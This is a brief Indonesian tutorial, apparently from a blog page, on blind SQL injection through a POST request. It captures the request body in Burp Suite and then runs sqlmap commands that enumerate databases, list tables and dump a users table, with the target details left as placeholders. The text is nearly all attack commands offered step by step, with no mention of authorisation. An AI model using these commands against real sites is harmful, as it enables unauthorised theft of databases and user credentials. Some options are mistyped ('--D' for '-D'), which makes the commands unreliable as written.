Blind SQL Injection (Post Method)
Buka Burpsuite intercept data misalnya di body ada : id=1&submit=submit
# sqlmap -u 'http://(burpsuite Post)' --data='id=1&submit=submit(body)' --cookie='PHPSESID=xxxx;xxx' --random-agent --referer='http://xxx' -p id --dbs
Y
Y
Y
kalau sudah ketemu databasenya
# sqlmap -u 'http://(burpsuite Post)' --data='id=1&submit=submit(body)' --cookie='PHPSESID=xxxx;xxx' --random-agent --referer='http://xxx' -p id --D dbname --tables
kalau sudah ketemu table nya
# sqlmap -u 'http://(burpsuite Post)' --data='id=1&submit=submit(body)' --cookie='PHPSESID=xxxx;xxx' --random-agent --referer='http://xxx' -p id --D dbname -T users
dump
dst...
kalau belum jelas lihat di sini :
Komentar